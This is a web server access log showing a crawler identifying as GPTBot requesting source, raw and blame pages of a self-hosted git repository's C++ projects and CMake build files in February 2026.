- GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 26816] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:13:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:15:13:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11358] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm" +[17/Feb/2026:15:13:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11358] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm" +[17/Feb/2026:15:13:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10876] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build" +[17/Feb/2026:15:13:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10878] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build" +[17/Feb/2026:15:13:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10868] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build" +[17/Feb/2026:15:13:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10504] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project" +[17/Feb/2026:15:13:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject" [Client 74.7.227.38] [Length 10721] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project" +[17/Feb/2026:15:13:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject" [Client 74.7.227.38] [Length 10725] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project" +[17/Feb/2026:15:13:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject" [Client 74.7.227.38] [Length 10727] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project" +[17/Feb/2026:15:13:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject" [Client 74.7.227.38] [Length 10724] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project" +[17/Feb/2026:15:13:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject" [Client 74.7.227.38] [Length 10725] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project" +[17/Feb/2026:15:13:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10422] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:15:13:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10419] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:15:13:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14158] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:13:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11147] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:13:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14159] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:13:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10860] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm" +[17/Feb/2026:15:13:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10162] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject" +[17/Feb/2026:15:13:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10164] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject" +[17/Feb/2026:15:13:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11113] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject" +[17/Feb/2026:15:13:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10167] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject" +[17/Feb/2026:15:13:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10164] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject" +[17/Feb/2026:15:13:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10162] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject" +[17/Feb/2026:15:13:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11405] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject" +[17/Feb/2026:15:13:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11407] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject" +[17/Feb/2026:15:13:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11406] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject" +[17/Feb/2026:15:13:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11405] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject" +[17/Feb/2026:15:13:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11404] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject" +[17/Feb/2026:15:13:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14159] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:13:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 6458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13349] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build" +[17/Feb/2026:15:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 6458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11147] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:13:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main.cpp" +[17/Feb/2026:15:13:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main.cpp" +[17/Feb/2026:15:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main.cpp" +[17/Feb/2026:15:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main.cpp" +[17/Feb/2026:15:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main.cpp" +[17/Feb/2026:15:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 18934] [Gzip 14.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:13:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 6458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:13:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13480] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:15:13:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:15:13:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11146] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:13:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:13:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11877] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:13:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11879] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11876] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10696] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm" +[17/Feb/2026:15:13:47 +0000] - 200 200 - 